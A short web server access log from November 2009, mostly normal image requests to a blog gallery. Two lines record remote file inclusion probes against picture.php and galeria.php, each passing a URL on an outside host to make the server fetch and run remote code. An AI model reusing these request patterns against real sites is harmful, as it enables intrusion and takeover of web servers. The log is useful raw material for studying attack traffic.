78.108.57.125 - - [20/Nov/2009:11:42:53 -0800] "GET /logs//picture.php?id=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:42:54 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture009-1024.jpg HTTP/1.1" 200 66129 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:03 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-082_0.jpg HTTP/1.1" 200 322728 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:16 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-112_1.jpg HTTP/1.1" 200 361759 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:20 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture049-1024.jpg HTTP/1.1" 200 87358 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:29 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:33 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture003-1024.jpg HTTP/1.1" 200 99498 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:42 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture197-1024.jpg HTTP/1.1" 200 75645 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture045-1024.jpg HTTP/1.1" 200 76062 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:43:55 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture143-1024.jpg HTTP/1.1" 200 91855 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:44:02 -0800] "GET /logs/access_090623.log//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:44:07 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture257-1024.jpg HTTP/1.1" 200 144853 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
